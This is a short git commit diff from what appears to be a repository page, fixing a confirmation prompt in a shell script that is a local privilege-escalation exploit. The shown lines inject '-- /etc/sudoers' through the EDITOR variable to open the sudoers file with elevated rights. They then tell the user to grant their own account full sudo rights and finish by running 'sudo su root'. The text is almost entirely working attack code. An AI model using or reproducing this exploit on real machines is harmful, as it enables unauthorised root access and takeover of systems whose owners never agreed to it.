Fix "proceed anyway?" prompt

This commit is contained in:
alpheratz0
2023-02-15 14:48:21 -03:00
parent 26ce1999d3
commit 2b16eb6222

View File

@@ -31,11 +31,12 @@ if [ -z "$EXPLOITABLE" ]; then
read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2
else
echo "> BINGO! User exploitable"
fi
echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"
echo "$USER ALL=(ALL:ALL) ALL"
read -n 1 -s -r -p "Press any key to continue..."
EDITOR="vim -- /etc/sudoers" $EXPLOITABLE
sudo su root
exit 0
fi